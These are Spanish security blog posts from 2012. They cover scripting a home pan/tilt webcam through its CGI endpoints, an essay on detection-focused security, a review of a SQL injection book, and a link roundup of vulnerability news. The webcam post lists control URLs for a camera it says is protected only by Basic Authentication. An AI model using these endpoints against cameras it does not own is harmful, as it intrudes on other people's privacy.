¿Jugamos con la webcam?

noreply@blogger.com (Lorenzo Martínez) — Thu, 03 May 2012 04:32:00 +0000

No, no penséis que, por el título, el post de hoy es un anuncio pr0n. Ya he hablado varias veces en SbD de la potencia del software Motion para monitorización y grabación de movimientos de estancias, utilizando cámaras de todo tipo.

Llevaba ya tiempo con la idea de evolucionar la cámara IP que tenía en la terraza, que apunta hacia un lado de ésta únicamente, por una cámara motorizada, que permita "echar un vistazo" rápido hacia el otro lado de la misma, para ver si todo está en su sitio o no. Ya sabéis, algo nuevo para alimentar mi propio "Homeland Security" y darle algo más para hacer a mi pequeño Skynet.

En mi labor de búsqueda por algo sencillito, ví que las cámaras de marcas reconocidas costaban más de lo que yo pretendía gastarme. Así, encontré una tienda que vende varios tipos de webcam de este tipo. En general, y por lo que hablé con la gente de la tienda, todas estas webcams de segunda marca, son chinas (yo supongo que las de primera también, pero tienen mejor calidad). Entre otras, probé una de marca Apexis que me ha dado bastante buen resultado. Ya sea wireless o cableada, se gestiona mediante un panel web, con versiones para Internet Explorer (un ActiveX), resto de navegadores y móviles.

Es decir, que si NATeamos un puerto desde el router ADSL hacia la IP de gestión de la webcam, se puede acceder y jugar con ella desde Internet (vamos, tú y todos los que se peguen con una autenticación vulnerable a fuerza bruta y diccionario). Si no es necesario acceder desde un dispositivo móvil limitado, es mejor hacerlo mediante una VPN. En mi caso, he aprovechado las capacidades de un proxy inverso de Apache con mod_proxy, que requiera un certificado SSL X.509 de cliente como autenticación a la gestión de la misma. De esta manera, aunque el protocolo de acceso utilizado contra la webcam es HTTP, forzar el uso de HTTPS hasta mi proxy inverso, la autenticación (de usuario/contraseña) a través de la red insegura, va cifrada, y la conexión además irá autenticada mediante el certificado válido.

La aplicación web de gestión de la webcam, permite moverla hacia cualquier posición. El firmware de la mía además, permite memorizar hasta 15 posiciones diferentes de la cámara, y por supuesto hacer que la cámara vaya a cualquiera de ellas.

En la foto de abajo podéis ver el panel de gestión de la webcam, y he puesto una foto de una terraza con arena y mar ;D

Trasteando con Tamper Data (últimamente lo uso más que el procesador de textos) me dí cuenta que, al igual que otros equipos caseros que he mirado, la autenticación utilizada para el panel web es Basic Authentication, ni cookies de sesión, ni tokens dinámicos en parámetros ni nada de nada. No se han complicado mucho la existencia esta gente con eso de "la seguridad". Con esto en la mano, ya sólo queda sentarse a probar las diferentes opciones, y documentarlas/scriptearlas para poder hacer que la webcam tenga vida propia mediante llamadas mediante línea de comandos, o que sea Skynet quien lo haga en base a sus propias decisiones.

Además, en mi caso particular, el programa Motion que corre cuando no hay ningún habitante en casa, monitoriza la actividad provista por streaming desde la webcam y, cuando detecta movimiento, me avisa y graba en video el mismo. Debido a que la cámara está en el exterior y que dispone de sensores infrarrojos para permitir visión nocturna, no es sencillo ecualizar los parámetros de brillo y contraste para evitar que cualquier cambio de luz genere falsos positivos al programa Motion. Es decir, que según la hora que sea, estaría bien modificarlo a dinámicamente para que la imagen fuese siempre correcta, tanto para la vista como para la monitorización.

Teniendo claro cuáles son las llamadas que se hace al panel web para balancear estos parámetros, es cuestión de aguja e hilo, el añadir a mi bot Gtalk y a Skynet la funcionalidad de mover la webcam a las posiciones pre-memorizadas, y dependiendo de la hora que sea, ajustar dinámicamente el brillo y el modo (50 Hz, 60 Hz o outdoor)

Así, se ven las siguientes peticiones:

GET "http://".$ip_webcam."/camera_control.cgi\?param=1\&value=$value";

-> Donde $ip_webcam está claro lo que es y el parámetro "value" es un valor de 0 a 240, correspondiente a multiplicar por 16 un valor entre 1 y 15.

GET "http://".$ip_webcam."/decoder_control.cgi?command=$x" // Vete a la posicion memorizada 1

-> En este caso, para mover la cámara a una de las posiciones pre-memorizadas, el valor $x empieza en 31 para la posición 1, 33 para la posición 2, 35 para la 3 y así sucesivamente. Es decir, que $x = 30 + (($pos*2) -1)

Bueno pues si sirve de ayuda a los que tengáis este tipo de webcam, he hecho un par de scripts separados (que en mi casa, son dos funciones dentro de "Skynet") para hacer que se mueva de forma manual a la posición pre-configurada.

GET "http://".$ip_webcam."/camera_control.cgi?param=3&value=$x";

-> $ip_webcam es la IP de gestión de la webcam y el parámetro "value", es un valor entre 0 y 2, correspondiente a los modos: 50 Mhz, 60 Mhz y Outdoor, respectivamente.

Cuando es de noche, conviene configurar el modo de la webcam a "50 Hz" y de día en modo "Outdoor"

webcam_pos.pl

webcam_brillo.pl

DISCLAIMER: Señores de la Agencia de Protección de Datos: La cámara no la uso para grabar a personas por la calle, ni siquiera de otras casas (no he visto vecinas, ni en mi casa, ni en la de enfrente que merezcan comprar una cámara con zoom).

¿Cuánto es suficiente en Seguridad?

noreply@blogger.com (Contribuciones) — Wed, 02 May 2012 04:32:00 +0000

“En una pelea la mejor técnica es no tener una técnica.

Mi técnica es el resultado de su técnica.

Mi movimiento es el resultado de su movimiento.”

Bruce Lee

Es un gusto enorme y un placer para mí comenzar mi colaboración para un sitio tan importante como este. En esta primera aportación quiero compartirles algo del contenido de mi charla en el pasado evento ACK Security Conference 2012 realizado en la bella ciudad de Manizales, Colombia y donde tuve la oportunidad de conocer algunos de los mejores profesionales en Seguridad Informática de Latinoamérica y España, entre ellos a mi ahora buen amigo Lorenzo Martínez.

Durante los últimos meses hemos sido testigos de una ofensiva mas fuerte y agresiva contra Empresas y Organismos de Gobierno de las que se hayan visto anteriormente; casos como RSA, HB Gary, FBI, CIA, NASA etc... nos hacen plantearnos una serie de preguntas ¿Estas Empresas no contaban con los mecanismos de seguridad para detener estos ataques? ¿Realmente no han invertido lo suficiente para protegerse? Si revisamos la anatomía de dichos ataques nos daremos cuenta que en realidad en la mayoría de los casos no son tan sofisticados como pensamos y se concretaron de alguna forma gracias al factor humano ¿Cuál es entonces el problema?

El problema es que estamos planteando y enfrentando la situación de una manera inadecuada. Todos sabemos que existen estándares, guías, buenas prácticas, normativas y una cantidad importante de herramientas en el mercado. Hay Empresas que invierten una cantidad importante de recursos para asegurarse de implementar muchos de estos modelos y adquieren herramientas costosas de Seguridad. Sin embargo, esto parece no ser suficiente. Y es que la realidad nos dice que siempre existe un eslabón débil en la cadena que si es identificada por un potencial atacante, puede ser el punto de entrada para un compromiso mayor.

Hoy en día se están desarrollando herramientas muy sofisticadas, incluso son diseñadas para evitar ser detectadas por IDS o Antivirus, se encuentran en el mercado negro e incluso se crean a la medida del que lo solicita. Diariamente aparecen miles de muestras de malware cuyo objetivo es ser utilizados en actividades de espionaje o cibercrimen.

Ante este complicado escenario ¿qué se puede hacer? Lo más importante es entender que la seguridad debe ser visualizada bajo un enfoque no solo de herramientas y buenas prácticas. Durante mucho tiempo nos hemos concentrado solamente en acciones de defensa y contención, pensando que eso será suficiente. Basta con realizar un pequeño ejercicio de valoración, como por ejemplo revisar las cifras de cuantas empresas realmente cuentan con un área formal de respuesta a incidentes, cuántas de ellas cuentan con planes confiables que se puedan integrar con los de continuidad de negocios. En pocas palabras, no estamos siendo proactivos sino reactivos.

Una forma de replantear esta estrategia sería crear modelos eficientes de monitoreo y detección. Para esto es importante diseñar una buena arquitectura de seguridad donde sea posible detectar cualquier situación de amenaza en el menor tiempo posible.

Recordando un concepto de uno de los libros que Bill Gates que escribió hace más de una década “Los negocios en la era digital” y que me parece muy interesante. En él planteaba la analogía entre un sistema nervioso humano con un sistema digital. Él menciona en su libro que un sistema digital debe ser lo mas parecido al humano debido a que, cuando nuestros sensores nerviosos detectan una acción amenazante que pueda dañar al organismo, inmediatamente reaccionan enviando un mensaje al cerebro para que este tome acción, como en el caso de que estamos sufriendo una quemadura. Si no fuera así, tendríamos daños muy severos.

En el caso de los sistemas de seguridad, estos deben ser diseñados desde la misma óptica de funcionamiento que el sistema nervioso humano. Debemos crear una estructura que permita detectar a tiempo un ataque y en ese momento actuar en consecuencia respondiendo al incidente. Mientras más rápidamente se reaccione, menor será el daño y evitaremos que se extienda y derive en situaciones más graves, como la pérdida de información o el compromiso de sistemas estructurales.

Debemos tener la capacidad de adaptarnos a la forma en que los atacantes utilizan nuevas técnicas y herramientas para defender los sistemas de manera eficiente, existe en la actualidad un desfase importante en las capacidades de los atacantes y de quienes defienden. El personal que se asigne para las tareas de monitoreo, realmente debe estar preparada para identificar incidentes. En la actualidad confiamos en que los sistemas de detección harán todo el trabajo y olvidamos que hay gente trabajando 24 x 7 creando herramientas capaces de evadir estos sistemas.

Podemos elegir entre justificar la asignación presupuestal de cada año al área de seguridad comprando herramientas costosas, realizando evaluaciones de vulnerabilidades y pruebas de penetración solo para cumplir con normativas o realmente replantear y restructurar la forma como vamos a contar con un sistema eficiente de identificación y respuesta. No es cuestión de cuánto se invierta sino en plantear una estrategia inteligente.

Contribución por cortesía de: Roberto Martínez

Libro: Hacking de Aplicaciones Web: SQL Injection

noreply@blogger.com (Alejandro Ramos) — Mon, 30 Apr 2012 06:23:00 +0000

Pese a que me manejo en inyecciones de SQL, sobre todo en MySQL, compre un ejemplar de este libro que detalla exclusivamente esta vulnerabilidad para fortalecer las partes en la que estoy pez, como por ejemplo SQL Server o las técnicas de "Serialized", a la que dedican un capítulo entero. Además siempre aprovecho para poder escribir luego una entrada como esta en el blog :-)

Los autores son Enrique Rando y Chema Alonso, que ya han publicado otros libros como Hacking con buscadores o Análisis Forense Digital en Entornos Windows.

El libro consta de más de 250 páginas divididas en cinco capítulos, desde la detección más básica hasta un análisis de las diferencias entre los distintos motores de bases de datos. En concreto su índice a grandes rasgos es el siguiente:

1.- SQL Injection a partir de (casi) cero

2.- Serialized SQL Injection

3.- Blind SQL Injection

4.- Objetivos Llamativos

5.- Otras diferencias entre DBMS

De todas las técnicas que se van exponiendo se muestran scripts de ejemplo para que el lector haga su propio laboratorio y las pruebas que quiera, y a partir de ahí, se describe como se detecta, analiza y explota la vulnerabilidad. El resultado es realmente práctico, ya que si sigues los pasos es prácticamente imposible que no lo entiendas a la perfección. Eso sí, hubiera estado bien que las páginas de prueba se pudieran descargar desde alguna web, ya que tener que "picarlas" desde el libro es un poco tedioso.

Además del detalle técnico, también se habla de herramientas que automatizan el proceso, describiendo su funcionamiento y sus características, ¡y se han acordado de bfsql!, que por cierto, otra persona ha continuado desarrollando en la v2.

El libro cuesta 20€ y hay que solicitarlo en la página web de la editora: Informatica64, la futura O'Reilly.

Enlaces de la SECmana - 121

noreply@blogger.com (José A. Guasch) — Sun, 29 Apr 2012 07:30:00 +0000

Nueva versión de WebGoat 5.4, la aplicación web J2EE con vulnerabilidades para realizar pruebas de seguridad sobre ella, perteneciente a OWASP.
Nils Juenemann, investigador y contribuidor de vulnerabilidades para Google+, explica en su blog como ha conseguido donar todo lo obtenido del Google Vulnerability Reward Program tras reportar un Cross-Site Scripting persistente y así apoyar la construcción de un nuevo colegio en Etiopía.
Cómo obtener la dirección IP de un contacto de Skype, con un poco de Perl y una versión parcheada del cliente.
Ya disponible el video del streaming que emitimos en el Security Blogger Summit 2012 del pasado 19 de abril, organizado por Panda Security.
Polémica tras descubrir una puerta trasera muy accesible desde Internet en un equipamiento hardware en el que se ejecuta el sistema operativo Rugged, que actúa como los switches y hubs que conectan los controladores de lógica programable a las redes de ordenadores utilizadas para su envío de comandos. Aquí el post en Full-Disclosure que empezó todo.
Genial post titulado "Pwning a Spammer's Keylogger" en el blog de Spiderlabs escrito por Rodel Mendrez en el que cuenta sus andanzas analizando un malware que resultó ser un keylogger, y del que pudo comprometer el servidor que recopilaba todas las capturas.
En el blog de Taddong anuncian el comienzo del OWASP ZAP SmartCard Project, proyecto que pretende incluir soporte de diferentes métodos de autenticación e identificación digital de diferentes países (como el DNIe para España) dentro de la herramienta ZAP, y así permitir la auditoría de las aplicaciones web que hagan uso de dichos mecanismos.
En HackTimes publican una colaboración de Óscar de Pedro en la que se cuenta una fuga de datos reportada a McAfee, que permitía a un usuario, aprovechando una vulnerabilidad en la ePO, con únicamente permisos para poder acceder a la ePO puede ver paneles de reporte donde obtener diversa información de otros equipos gestionados y de su actividad en lo que se refiere a alertas detectadas por la propia ePO, malware encontrado, número de sistemas y datos de los mismos como, por ejemplo, Sistema Operativo, dirección IP, nombre del usuario administrador, etc. En este enlace se puede ver el boletín de seguridad de McAfee en el que se menciona esta vulnerabilidad.
Se filtra código fuente del producto ESX de VMWare, de entre 2003 y 2004, por parte de un hacker que dice haberlo obtenido tras comprometer una firma china, CEIE, que trabaja con el ejército chino. VMWare declara que como política de empresa, se suele compartir ciertas partes del código con diferentes empresas externas (algo que también hace Microsoft, por ejemplo...). Y que por tanto, existen otras partes que se podrían obtener de otros lugares.
Grave vulnerabilidad en el sistema de recuperación de contraseñas de Microsoft MSN Hotmail, que permitía reiniciar la contraseña con valores elegidos por un atacante.